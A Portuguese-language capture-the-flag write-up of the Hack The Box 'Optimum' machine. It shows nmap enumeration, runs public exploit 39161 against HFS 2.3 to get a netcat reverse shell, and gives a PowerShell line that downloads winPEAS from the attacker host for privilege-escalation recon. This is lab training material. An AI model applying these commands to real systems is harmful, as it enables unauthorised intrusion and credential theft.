Optimum - HTB Write Up - HFS 2.3 Exploit


HFS 2.3 Exploit

Enumeração 

NMAP Geral 

nmap -Pn -sV [IP]


HTTP Scan

nmap -Pn -A -p 80 [IP]


O resultado do scan mostra a aplicação HFS na versão 2.3 na porta 80/tcp


Usando o Searchsploit para buscar exploits disponíveis para o HFS 

searchsploit HFS 


No resultado do scan, o sistema operacional indicado é Windows. Ao pesquisar pelos exploits, escolhi o 39161 e para executar esse exploit é necessário usar o Python 2.7, então habilitei o ambiente virtual com o Python 2.7

Na descrição do exploit é informado que é necessário executar um web server na máquina-atacante dentro de um diretório onde o nc.exe esteja pois o exploit usar esse executável para fazer a conexão reversa para a máquina-atacante. 


O nc.exe pode ser encontrado no Kali em /usr/share/windows-resources/binaries 

Na máquina-atacante habilitei o web server com o python 2.7 usando o ambiente virtual 

python2.7 -m SimpleHTTPServer 80



No script do exploit é necessário configurar o IP-Local e a Porta-Local da máquina-atacante. A porta configurada é do NCat e não do web server. 


Comando para executar o exploit

python2.7 39161.py [IP-Alvo] [PORT-Alvo] 

Ao executar o exploit, a conexão reversa é estabelecida. 


Recon Interno

systeminfo



Usando a ferramenta winPEASx64 para enumerar as informações do servidor e buscar por possíveis pontos de exploração para executar a escalação de privilégio. O download da ferramenta pode ser feito AQUI e o repositório oficial da ferramenta é esse AQUI

Executei o download da ferramenta com o Powershell

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.55:80/winPEASx64.exe', 'c:\Users\kostas\Desktop\winPEASx64.exe')"

Primeiro executei com o parametro userinfo e o resultado trouxe a credencial do usuário Kostas e a informação de que o diretório Administrator é acessível pelo usuário Kostas. 

c:\Users\kostas\Desktop\.\winPEASx64.exe userinfo 





Aqui nesse ponto, a flag do Administrator foi possível capturar. No entanto, a escalação de privilégio no servidor não foi realizada, o acesso do usuário Kostas no diretório Administrator é apenas uma configuração incorreta. 






Comentários

Postagens mais visitadas